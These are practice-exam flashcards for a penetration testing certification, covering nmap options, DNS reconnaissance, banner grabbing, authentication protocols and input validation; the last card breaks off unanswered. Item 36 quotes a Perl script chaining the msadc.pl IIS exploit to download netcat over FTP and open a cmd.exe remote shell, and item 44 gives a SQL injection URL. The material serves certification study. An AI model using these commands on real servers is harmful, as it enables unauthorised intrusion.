practice exam 3 Flashcards

1
Q

Which of the following is NOT a means of improving data validation and trust?

A. Encrypting data in transit

B. Using MD5 checksums for files

C. Decrypting data at rest

D. Implementing Tripwire

A

C. Decrypting data at rest
Explanation
OBJ-1.1: Encrypting data in transit leads to more integrity and confidentiality of the data, and therefore trust. Hashing files using MD5 to check against known valid checksums would provide integrity, and therefore validation and trust. Implementing a file integrity monitoring program, such as Tripwire, would also improve data validation and trust. Decrypting data at rest does not improve data validation or trust, since the data at rest could be modified once decrypted.

2
Q

Which of the following would trigger the penetration tester to stop and contact the system owners during an engagement?

A. Discovery of obfuscated PHI data being stored on the system

B. Discovery of an indicator of compromise on a production server

C. Discovery of missing Windows security patches on a production server

D. Discovery of default credentials on an appliance in a staging network

A

B. Discovery of an indicator of compromise on a production server
Explanation
OBJ-1.1: The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, or extremely critical findings on a production server, or if a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contact their trusted point of contact within the organization to get further guidance.

3
Q

Which of the following identity and access management controls relies upon using a certificate-based authentication mechanism?

A. HOTP

B. Smart card

C. TOTP

D. Proximity card

A

B. Smart card
Explanation
OBJ-1.1: Smart cards, PIV, and CAC devices are used as an identity and access management control. These devices contain a digital certificate embedded within the smart card (PIV/CAC) presented to the system when it is inserted into the smart card reader. When combined with a PIN, the smart card can be used as a multi-factor authentication mechanism. The PIN unlocks the card and allows the digital certificate to be presented to the system.

4
Q

What type of scan will measure the size or distance of a person’s external features with a digital video camera?

A. Iris scan

B. Retinal scan

C. Facial recognition scan

D. Signature kinetics scan

A

C. Facial recognition scan
Explanation
OBJ-1.1: A face recognition system is a computer application capable of identifying or verifying a person from a digital image or a video frame from a video source. One way to do this is by comparing selected facial features from the image and a face database. By measuring the external facial features, such as the distance between your eyes and nose, you can uniquely identify the user. A retinal scan is a biometric technique that uses unique patterns on a person’s retina blood vessels. Iris recognition or iris scanning is the process of using visible and near-infrared light to take a high-contrast photograph of a person’s iris. A signature kinetics scan measures a user’s action when signing their name and compares it against a known-good example or baseline.

5
Q

Which of the following will an adversary do during the exploitation phase of the Lockheed Martin kill chain? (SELECT THREE)

A. Take advantage of a software, hardware, or human vulnerability

B. Select backdoor implant and appropriate command and control infrastructure for operation

C. Wait for a malicious email attachment to be opened

D. Wait for a user to click on a malicious link

E. A webshell is installed on a web server

F. A backdoor/implant is placed on a victim’s client

A

A. Take advantage of a software, hardware, or human vulnerability
C. Wait for a malicious email attachment to be opened
D. Wait for a user to click on a malicious link
Explanation
OBJ-1.1: During the exploitation phase, actions are taken directly against the target’s system. Taking advantage of or exploiting an accessible vulnerability, waiting for a malicious email attachment to be opened, or waiting for a user to click on a malicious link are all part of the exploitation phase. The installation of a web shell, backdoor, or implant is performed during the installation phase. Selecting a backdoor implant and appropriate command and control infrastructure occurs during the weaponization phase.

6
Q

What should administrators perform to reduce a system’s attack surface and remove unnecessary software, services, and insecure configuration settings?

A. Harvesting

B. Windowing

C. Hardening

D. Stealthing

A

C. Hardening
Explanation
OBJ-1.1: Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle, a single-function system is more secure than a multipurpose one. Reducing the available ways of attack typically includes changing default passwords, removing unnecessary software and unnecessary usernames or logins, and disabling or removing unnecessary services. Windowing is the use of windows for the simultaneous display of more than one item on a screen. Harvesting is the process of gathering data, normally user credentials. Stealthing is a made-up term in this question.

7
Q

Which of the following pairs of authentication factors should you choose to meet the requirements associated with MFA?

A. Username and password

B. Username and pin

C. Thumbprint and password

D. Thumbprint and retina scan

A

C. Thumbprint and password
Explanation
OBJ-1.1: Multi-factor authentication (MFA) requires a user to provide at least two different forms of authentication: something you know (username, password, pin), something you have (token, key fob, smartphone), something you are (fingerprint, retina scan), something you do (the way you speak a phrase or sign your name), or somewhere you are (location factor based on IP address or geolocation).

8
Q

Which of the following provides accounting, authorization, and authentication via a centralized privileged database, as well as challenge/response and password encryption?

A. Multi-factor authentication

B. ISAKMP

C. TACACS+

D. Network access control

A

C. TACACS+
Explanation
OBJ-1.1: TACACS+ is an AAA (accounting, authorization, and authentication) protocol that provides AAA services for access to routers, network access points, and other networking devices.

9
Q

A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company’s security controls. Which DNS assessment technique would be classified as active?

A. A DNS forward or reverse lookup

B. A zone transfer

C. A whois query

D. Using maltego

A

B. A zone transfer
Explanation
OBJ-2.1: DNS zone transfer, also sometimes known by the DNS query type that induces it, AXFR, is a DNS transaction type. It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers. DNS zone transfers are an active technique. Performing a whois query is a passive reconnaissance technique that queries the databases storing the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but it is also used for a wider range of other information. Performing DNS forward and reverse lookups is an active technique that allows the resolution of names to IP addresses and IP addresses to names, but it can also be conducted as a passive technique. Maltego is used for open-source intelligence and forensics. It focuses on providing a library for data discovery from open sources and visualizing that information in a graph format suitable for link analysis and data mining. It collects this information passively since it can acquire the information from whois lookup servers, a DNS lookup tool using public DNS servers, or even emails and hostnames one can acquire from TheHarvester.

10
Q

You are working as part of a penetration testing team conducting an engagement against Dion Training’s network. You have been given a list of targets in a text file called servers.txt. Which of the following Nmap commands should you use to find all the servers from the list with ports 80 and 443 enabled and save the results in a greppable file called results.txt?

A. nmap -p80,443 -sL servers.txt -oX results.txt

B. nmap -p80,443 -iL servers.txt -oX results.txt

C. nmap -p80,443 -iL servers.txt -oG results.txt

D. nmap -p80,443 -sL servers.txt -oG results.txt

A

C. nmap -p80,443 -iL servers.txt -oG results.txt
Explanation
OBJ-2.2: The command (nmap -p80,443 -iL servers.txt -oG results.txt) will only perform an nmap scan against ports 80 and 443. The -iL option reads the list of target hosts from servers.txt and scans each of them. The -oG option will save the results in a greppable format to the file results.txt while still displaying the normal results in the shell. The -sL option will only list the servers to scan; it will not actually scan them. The -oX option outputs the results to a file in XML format.

11
Q

An attacker uses the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only name servers?

A. locate type=ns

B. request type=ns

C. set type=ns

D. transfer type=ns

A

C. set type=ns
Explanation
OBJ-2.1: The “set type=ns” command tells nslookup to report information only on name servers. If you used “set type=mx” instead, you would receive information only about mail exchange servers.

12
Q

As a newly hired cybersecurity analyst, you are attempting to determine your organization’s current public-facing attack surface. Which of the following methodologies or tools generates a current and historical view of the company’s public-facing IP space?

A. shodan.io

B. nmap

C. Google hacking

D. Review network diagrams

A

A. shodan.io
Explanation
OBJ-2.1: Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company’s public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company’s network. The nmap scanning tool can provide an analysis of the current state of public exposure but has no mechanism to determine the history, nor will it give the same depth of information that shodan.io provides. Google Hacking can determine if a public exposure occurred over public-facing protocols, but it cannot conclusively reveal all the exposures present. Google hacking relies on using advanced Google searches with advanced syntax to search for information across the internet. Network diagrams can show how a network was initially configured. Unless the diagrams are up-to-date, which they usually aren’t, they cannot show the current “as is” configuration. If you can only select one tool to find your attack surface’s current and historical view, shodan is your best choice.

13
Q

You have just finished running an nmap scan on a server and see the following output:

-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
# nmap diontraining.com 
Starting Nmap ( http://nmap.org )

Nmap scan report for diontraining.com (64.13.134.52)
Not shown: 996 filtered ports

PORT STATE
22/tcp open
23/tcp open
53/tcp open
443/tcp open
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-

Based on the output above, which of the following ports listed as open represents the most significant security vulnerability to your network?

A. 22

B. 23

C. 53

D. 443

A

B. 23
Explanation
OBJ-2.2: Port 23 is used by telnet and is not considered secure because it sends all of its data in cleartext, including authentication data like usernames and passwords. As an analyst, you should recommend that telnet is disabled and blocked from use. The other open ports are for SSH (port 22), DNS (port 53), and HTTPS (port 443).

14
Q

You are working as a service desk analyst. This morning, you have received multiple calls from users reporting that they cannot access websites from their work computers. You decide to troubleshoot the issue by opening up your command prompt on your Windows machine and running a program to determine where the network connectivity outage occurs. Which tool should you use to determine if the issue is on the intranet portion of your corporate network or if it is occurring due to a problem with your ISP?

A. netstat

B. nslookup

C. ping

D. tracert

A

D. tracert
Explanation
OBJ-2.1: Tracert is a command-line utility used to trace an IP packet’s path as it moves from its source to its destination. While using ping will tell you if the remote website is reachable or not, it will not tell you where the connection is broken. Tracert performs a series of ICMP echo requests to determine which device in the connection path is not responding appropriately. This will help to identify if the connectivity issue lies within your intranet or is a problem with the ISP’s connection.

15
Q

You are developing your vulnerability scanning plan and attempting to scope your scans properly. You have decided to focus on the criticality of a system to the organization’s operations when prioritizing the system in the scope of your scans. Which of the following would be the best place to gather the criticality of a system?

A. Ask the CEO for a list of the critical systems

B. Conduct a nmap scan of the network to determine the OS of each system

C. Scope the scan based on IP subnets

D. Review the asset inventory and BCP

A

D. Review the asset inventory and BCP
Explanation
OBJ-2.1: To best understand a system’s criticality, you should review the asset inventory and the BCP. Most organizations classify each asset in their inventory based on its criticality to the organization’s operations. This helps to determine how many spare parts to have, the warranty requirements, service agreements, and other key factors to help keep these assets online and running at all times. Additionally, you can review the business continuity plan (BCP), since this will provide the organization’s plan for continuing business operations in the event of a disaster or other outage. Generally, the systems or operations listed in a BCP are the most critical ones to support business operations. While the CEO may be able to provide a list of the most critical systems in a large organization, it isn’t easy to get them to take the time to do it, even if they did know the answer. Worse, in most large organizations, the CEO isn’t going to know which systems they rely on, only the business functions those systems serve, again making this a bad choice. While conducting an nmap scan may help you determine what OS is being run on each system, this information doesn’t help you determine criticality to operations. The same is true of using IP subnets, since a list of subnets by itself doesn’t provide criticality or prioritization of the assets.

16
Q

What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?

A. A stealth scan that scans ports 80 and 443

B. A stealth scan that scans ports 80 to 443

C. A stealth scan that scans all open ports excluding ports 80 to 443

D. A stealth scan that scans all ports from 80 to 443 and determines a target’s operating system

A

D. A stealth scan that scans all ports from 80 to 443 and determines a target’s operating system
Explanation
OBJ-2.2: When using NMAP, the -sS tells the tool to use a stealth scan using a TCP SYN packet, the -O is used to determine the operating system, and -p dictates which ports to scan. Since the ports were listed as 80-443, this indicates it includes all the ports from 80 through 443.

17
Q

A security analyst conducts a nmap scan of a server and found that port 25 is open. What risk might this server be exposed to?

A. Open file/print sharing

B. Web portal data leak

C. Clear text authentication

D. Open mail relay

A

D. Open mail relay
Explanation
OBJ-2.2: Port 25 is the default port for SMTP (Simple Mail Transfer Protocol), which is used for sending email. An open mail relay occurs when an SMTP server is configured in such a way that it allows anyone on the Internet to send email through it, not just mail originating from your known and trusted users. Spammers can exploit this type of vulnerability to use your email server for their own benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service, such as telnet (23), FTP (20/21), or the web (80).

18
Q

A penetration tester conducts an ACK scan using nmap against the external interface of a DMZ firewall. Nmap reports port 80 as “unfiltered”. What type of packet inspection is the firewall performing?

A. Host inspection

B. Stateful inspection

C. Stateless inspection

D. Application-level inspection

A

C. Stateless inspection
Explanation
OBJ-2.2: The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Based on the unfiltered port state, the firewall must be performing stateless inspection. Stateless firewalls watch network traffic, and restrict or block packets based on source and destination addresses or other static values. They are not ‘aware’ of traffic patterns or data flows. A stateless firewall uses simple rule-sets with ACLs.

19
Q

What system contains a publicly available set of databases with registration contact information for every domain name on the Internet?

A. WHOIS

B. IANA

C. CAPTCHA

D. IETF

A

A. WHOIS
Explanation
OBJ-2.1: WHOIS is a query and response protocol widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. WHOIS also is used for a broader range of information. The protocol stores and delivers database content in a human-readable format and is publicly available for use. The Internet Assigned Numbers Authority is a standards organization that oversees global IP address allocation, autonomous system number allocation, root zone management in the Domain Name System, media types, and other Internet Protocol-related symbols and Internet numbers. A CAPTCHA is a type of challenge-response test used in computing to determine whether the user is human. The Internet Engineering Task Force (IETF) is an open standards organization that develops and promotes voluntary Internet standards, particularly the standards that comprise the Internet protocol suite.

20
Q

If you want to conduct an operating system identification during a nmap scan, which syntax should you utilize?

A. nmap -os

B. nmap -O

C. nmap -id

D. nmap -osscan

A

B. nmap -O
Explanation
OBJ-2.2: The -O flag indicates to nmap that it should attempt to identify the target’s operating system during the scanning process. It does this by evaluating the responses it received during the scan against its signature database for each operating system.

21
Q

During scanning and enumeration, you have identified that port 69 is open on a server. Which of the following risks exist on this server?

A. Weak SSL cipher implementation

B. Cleartext logins are accepted

C. Web portal information disclosure

D. Unauthenticated access to the server

A

D. Unauthenticated access to the server
Explanation
OBJ-2.3: Trivial File Transfer Protocol (TFTP) uses port 69. TFTP allows a client to get a file from or put a file onto a remote host. TFTP has no login or access control mechanisms; therefore, if it is in use, it could allow unauthenticated access to the server.

22
Q

What techniques are commonly used by port and vulnerability scanners to identify the services running on a target system?

A. Comparing response fingerprints and registry scanning

B. Banner grabbing and UDP response timing

C. Using the -O option in nmap and UDP response timing

D. Banner grabbing and comparing response fingerprints

A

D. Banner grabbing and comparing response fingerprints
Explanation
OBJ-2.2: Service and version identification are often performed by conducting a banner grab or by checking responses for services to known fingerprints for those services. UDP response timing and other TCP/IP stack fingerprinting techniques are used to identify operating systems only. Using nmap -O will conduct an operating system fingerprint scan, but it will not identify the other services being run.

23
Q

Which of the following tools is used by a penetration tester to conduct open-source intelligence (OSINT)?

A. Nessus

B. Maltego

C. Empire

D. AirCrack-NG

A

B. Maltego
Explanation
OBJ-2.1: Maltego is an OSINT tool that is used to gather information from public resources. It has a graphical user interface (GUI) that visualizes the information gathered to help a penetration tester make logical connections between the different data sets collected.

24
Q

Which protocol relies on mutual authentication of the client and the server for its security?

A. RADIUS

B. Two-factor authentication

C. LDAPS

D. CHAP

A

C. LDAPS
Explanation
OBJ-2.3: The Lightweight Directory Access Protocol (LDAP) uses a client-server model for mutual authentication. LDAP is used to enable access to a directory of resources (workstations, users, information, etc.). TLS provides mutual authentication between clients and servers. Since Secure LDAP (LDAPS) uses TLS, it provides mutual authentication.

25
Q

You have been asked to add an entry to your DNS records to allow SMTP traffic to be sent out using your domain name. Which type of record should you add to your DNS record?

A. CNAME

B. A

C. MX

D. AAAA

A

C. MX
Explanation
OBJ-2.1: An MX record is used for outgoing (SMTP) and incoming (POP3/IMAP) traffic. An A record associates your domain name with an IPv4 address. An AAAA record associates your domain name with an IPv6 address. A CNAME record is a canonical name or alias name, which associates one domain name as an alias of another (like beta.diontraining.com and www.diontraining.com could refer to the same website using a CNAME).

26
Q

Which of the following ports is used by LDAP by default?

A. 53

B. 389

C. 427

D. 3389

A

B. 389
Explanation
OBJ-2.2: LDAP uses port 389 by default. LDAP (Lightweight Directory Access Protocol) is a standard for accessing and updating information in an X.500-style network resource directory. Unless secure communications are used, LDAP is vulnerable to packet sniffing and Man-in-the-Middle attacks. It is also usually necessary to configure user permissions on the directory. LDAP version 3 supports simple authentication or Simple Authentication and Security Layer (SASL), which integrates it with Kerberos or TLS.

27
Q

You have been asked to determine if Dion Training’s web server is vulnerable to a recently discovered attack on an older version of SSH. Which technique should you use to determine the current version of SSH running on their web server?

A. Vulnerability scan

B. Protocol analysis

C. Passive scan

D. Banner grabbing

A

D. Banner grabbing
Explanation
OBJ-2.2: Banner grabbing is conducted by actively connecting to the server using telnet or netcat and collecting the web server’s response. This banner usually contains the server’s operating system and the version number of the service (SSH) being run. This is the fastest and easiest way to determine the SSH version being run on this web server. While it is possible to use a vulnerability scanner, protocol analyzer, or to conduct a passive scan to determine the SSH version, these are more time consuming and not fully accurate methods to determine the version being run.

28
Q

A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public webserver. The analyst opens up the terminal on his Kali Linux workstation and uses netcat to gather some information.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1

HTTP/1.1 200 OK
Date: Sun, 12 Jun 2020 14:12:45 AST
Server: Apache/2.0.46 (Unix)   (Red Hat/Linux)
Last-modified: Thu, 16 Apr 2009 11:20:14 PST
ETag: “1986-69b-123a4bc6”
Accept-Ranges: bytes
Content-Length: 6485
Connection: close
Content-Type: text/html
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of action did the analyst perform, based on the command and response above?

A. Cross-site scripting

B. Banner grabbing

C. SQL injection

D. Querying the Whois database

A

B. Banner grabbing
Explanation
OBJ-2.1: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command “nc test.diontraining.com 80” was used to establish a connection to a target web server using netcat, and then an HTTP request (HEAD / HTTP/1.1) was sent. The response contains information about the service running on the web server; in this example, it reveals the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser-side script, to a different end user. SQL injection is a code injection technique used to attack data-driven applications, where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the server’s operating system.

29
Q

Which of the following commands can be used to resolve a DNS name to an IP address?

A. dns

B. query

C. host

D. iplookup

A

C. host
Explanation
OBJ-2.1: The host command is used for DNS (Domain Name System) lookup operations. It is used to find the IP address of a particular domain name or the domain name of a particular IP address. Nslookup and dig are also commands that can be used to lookup a domain name and convert it to an IP address within a Linux system.

30
Q

A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the operating system version of the system installed at 192.168.1.45. The analyst asks you to look over their nmap scan results:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Starting NMAP 7.60 at 2020-06-12 21:23:15

NMAP scan report for 192.168.1.45
Host is up (0.78s latency).
Not shown: 992 closed ports

PORT  STATE  SERVICE
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
515/tcp open
631/tcp open ipp
9100/tcp open
MAC Address: 00:0C:29:18:6B:DB
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following operating systems is most likely used by the host?

A. Windows server

B. Linux server

C. Windows workstation

D. Networked printer

A

D. Networked printer
Explanation
OBJ-2.2: Based on the open ports, it is likely that the host is a networked printer. Port 515 is used as an LPR/LPD port for most printers and older print servers. Port 631 is used for IPP by most modern printers and CUPS-based print servers. Port 9100 is used as a RAW port for most printers and is also known as the direct-IP port. If any of these three ports are found, the host is likely a printer. If ports 135, 139, and 445 are found, this is usually a good indication of a Windows file server. Ports such as FTP, telnet, SMTP, and HTTP are used by both Windows and Linux servers; therefore, they are not as helpful in indicating which operating system is in use by the host.

31
Q

A penetration tester hired by a bank began searching for the bank’s IP ranges by performing lookups on the bank’s DNS servers, reading news articles online about the bank, monitoring what times the bank’s employees came into and left work, searching job postings (with a special focus on the bank’s information technology jobs), and even searching the corporate office of the bank’s dumpster. Based on this description, what portion of the penetration test is being conducted?

A. Information reporting

B. Vulnerability assessment

C. Active information gathering

D. Passive information gathering

A

D. Passive information gathering
Explanation
OBJ-2.1: Passive information gathering consists of numerous activities in which the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed. In contrast, active information gathering starts to probe the organization using DNS enumeration, port scanning, and OS fingerprinting techniques. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.

32
Q

Which of the following ports are used to provide secure remote connection sessions over the Internet?

A. 22

B. 25

C. 80

D. 23

A

A. 22
Explanation
OBJ-2.2: Port 22 is used by Secure Shell (SSH) to securely create communication sessions over the Internet for remote access to a server or system. Telnet uses port 23, but it is insecure and doesn’t provide an encrypted tunnel like SSH does. Port 25 is for SMTP and port 80 is for HTTP, neither of which provides an encrypted tunnel either.

33
Q

A cybersecurity analyst reviewed the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?

A. Returns no useful results for an attacker

B. Returns all web pages containing the text diontraining.com

C. Returns all web pages containing an email address affiliated with diontraining.com

D. Returns all web pages hosted at diontraining.com

A

C. Returns all web pages containing an email address affiliated with diontraining.com
Explanation
OBJ-2.1: Google interprets this statement as <anything>@diontraining.com and understands that the user is searching for email addresses, since %40 is the URL-encoded form of the @ symbol. The * is a wildcard character, meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear-phishing campaign. To return all web pages hosted at diontraining.com, you should use the “site:” modifier in the query. To return all web pages containing the text diontraining.com, enter “diontraining.com” into the Google search bar with no modifiers.

34
Q

Which of the following port or ports does SIP use?

A. 443

B. 389/636

C. 135/139/445

D. 5060/5061

A

D. 5060/5061
Explanation
OBJ-2.3: SIP works with other protocols over 5060/5061. 443 is HTTPS, 389/636 is LDAP, and 135/139/445 is NetBIOS and SMB.

35
Q

A cybersecurity analyst at Yoyodyne Systems just finished reading a news article about their competitor, Whamiedyne Systems, being hacked by an unknown threat actor. Both companies sell to the same basic group of consumers over the internet since their products are used interchangeably by consumers. Which of the following is a valid cybersecurity concern for Yoyodyne Systems?

A. The attacker will conduct a man-in-the-middle attack

B. The same vulnerability will be compromised on their servers

C. The attacker will conduct a SQL injection against their database

D. They may now be vulnerable to a credential stuffing attack

A

D. They may now be vulnerable to a credential stuffing attack
Explanation
OBJ-5.1: The largest and most immediate cybersecurity concern that the analyst should have is credential stuffing. Credential stuffing occurs when an attacker tests username and password combinations against multiple online sites. Since both companies share a common consumer group, it is likely that some of Yoyodyne’s consumers also had a user account at Whamiedyne. If the attackers compromised the usernames and passwords from Whamiedyne’s servers, they might attempt to use those credentials on Yoyodyne’s servers, too. There is no definitive reason to believe that both companies are using the same infrastructure. Therefore, the same vulnerability that was exploited by the attacker may not exist at Yoyodyne. The question doesn’t mention an SQL database. Therefore, there is no direct threat of an SQL injection. A man-in-the-middle (MitM) attack occurs when the attacker sits between two communicating hosts and transparently captures, monitors, and relays all communications between the hosts. Nothing in this question indicates that a MitM was utilized or is a possible threat.

36
Q

A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the web server. While the msadc.pl script is effective, the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a Perl script that runs the following msadc commands:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");
system("perl msadc.pl -h $host -C \"ftp -s:tempfile\"");
$o=; print "Opening FTP connection…\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which exploit type is indicated by this script?

A. Buffer overflow exploit

B. Chained exploit

C. SQL injection exploit

D. Denial of Service exploit

A

B. Chained exploit
Explanation
OBJ-5.2: The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly that occurs when a program, while writing data to a buffer, overruns the buffer’s boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions.

37
Q

Which of the following is the leading cause for cross-site scripting, SQL injection, and XML injection attacks?

A. Directory traversals

B. File inclusions

C. Faulty input validation

D. Output encoding

A

C. Faulty input validation
Explanation
OBJ-5.1: A primary vector for attacking applications is to exploit faulty input validation. The input could include user data entered into a form or URL, passed by another application or link. This is heavily exploited by cross-site scripting, SQL injection, and XML injection attacks. Directory traversal is the practice of accessing a file from a location that the user is unauthorized to access. The attacker does this by ordering an application to backtrack through the directory path to read or execute a file in a parent directory. In a file inclusion attack, the attacker adds a file to a web app or website’s running process. The file is either constructed to be malicious or manipulated to serve the attacker’s malicious purposes. Cross-site scripting (XSS) is one of the most powerful input validation exploits. XSS involves a trusted site, a client browsing the trusted site, and the attacker’s site.

38
Q

Which of the following vulnerabilities can be prevented by using proper input validation? (Select ANY that apply)

A. Cross-site scripting

B. SQL injection

C. Directory traversal

D. XML injection

A

A. Cross-site scripting

B. SQL injection

C. Directory traversal

D. XML injection
Explanation
OBJ-5.1: Proper input validation can prevent cross-site scripting, SQL injection, directory traversal, and XML injections from occurring. When an application accepts string input, the input should be subjected to normalization or sanitization procedures before being accepted. Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. This can prevent SQL and XML injections from occurring. Input validation is also good at preventing cross-site scripting (XSS) in forms that accept user input. Directory traversals can be prevented by conducting input validation in file paths or URLs accepted from a user. This prevents a canonicalization attack from disguising the nature of the malicious input that could cause a directory traversal.

39
Q

A penetration tester is conducting software assurance testing on a web application for Dion Training. You discover the web application is vulnerable to an SQL injection and could disclose a regular user’s password. Which of the following actions should you perform?

A. Conduct a proof-of-concept exploit on three user accounts at random and document this in your report

B. Document the finding with an executive summary, methodology used, and a remediation recommendation

C. Contact the development team directly and recommend adding input validation to the web application

D. Recommend that the company conduct a full penetration test of their systems to identify other vulnerabilities

A

B. Document the finding with an executive summary, methodology used, and a remediation recommendation
Explanation
OBJ-5.3: When you find a vulnerability, it should be documented fully. This includes providing an executive summary for management, the methodology used to find the vulnerability so that others can recreate and verify it, and the recommended remediation actions that should be taken. You should not exploit three random accounts on the server, which could negatively impact the client’s reputation. You should not contact the development team directly since they may ignore your recommendation, and they did not hire you. While it may be a good idea to conduct a full-scale penetration test, that would not necessarily solve this vulnerability.

40
Q

Which of the following is NOT a valid reason to conduct reverse engineering?

A. To commit industrial espionage

B. To determine how a piece of malware operates

C. To allow the software developer to spot flaws in their source code

D. To allow an attacker to spot vulnerabilities in an executable

A

C. To allow the software developer to spot flaws in their source code
Explanation
OBJ-5.1: If a software developer has a copy of their source code, there is no need to reverse engineer it since they can directly examine the code. Doing this is known as static code analysis, not reverse engineering. Reverse engineering is the process of analyzing a system’s or application’s structure to reveal more about how it functions. In malware, examining the code that implements its functionality can provide you with information about how the malware propagates and its primary directives. Reverse engineering is also used to conduct industrial espionage since it can allow a company to figure out how a competitor’s application works and develop its own version. An attacker might use reverse engineering of an application or executable to identify a flaw or vulnerability in its operation and then exploit that flaw as part of their attack.

41
Q

Which of the following secure coding best practices ensures special characters like <, >, /, and ‘ are not accepted from the user via a web form?

A. Session management

B. Output encoding

C. Error handling

D. Input validation

A

D. Input validation
Explanation
OBJ-5.3: Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering a malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the user. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID. Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the &lt; string when writing to an HTML page.

42
Q

Your team is developing an update to a piece of code that allows customers to update their billing and shipping addresses in the web application. The shipping address field used in the database was designed with a limit of 75 characters. Your team’s web programmer has brought you some algorithms that may help prevent an attacker from trying to conduct a buffer overflow attack by submitting invalid input to the shipping address field. Which pseudo-code represents the best solution to prevent this issue?

A. if (shippingAddress = 75) {update field} else exit

B. if (shippingAddress != 75) {update field} else exit

C. if (shippingAddress >= 75) {update field} else exit

D. if (shippingAddress <= 75) {update field} else exit

A

D. if (shippingAddress <= 75) {update field} else exit
Explanation
OBJ-5.2: To ensure that the field is not overrun by an input that is too long, input validation must occur. Checking if the shipping address is less than or equal to 75 characters before updating the field will prevent a buffer overflow from occurring in this program. If the input is 76 characters or more, then the field will not be updated, and the algorithm will exit the function.

43
Q

You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server’s logs if your organization uses the default naming convention?

A. httpd_log

B. apache_log

C. access_log

D. http_log

A

C. access_log
Explanation
OBJ-5.1: On Apache web servers, the logs are stored in a file named access_log. By default, the file can be located at /var/log/httpd/access_log. This file records all requests processed by the Apache server. The WebSphere Application Server uses the httpd_log file for z/OS, which is a very outdated server from the early 2000s. The http_log file is actually a header class file in C used by the Apache web server’s pre-compiled code that provides the logging library but does not contain any actual logs itself. The file called apache_log is actually an executable program that parses Apache log files into a Postgres database.

44
Q

While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of exploit are you attempting?

A. Session hijacking

B. SQL injection

C. Buffer overflow

D. XML injection

A

B. SQL injection
Explanation
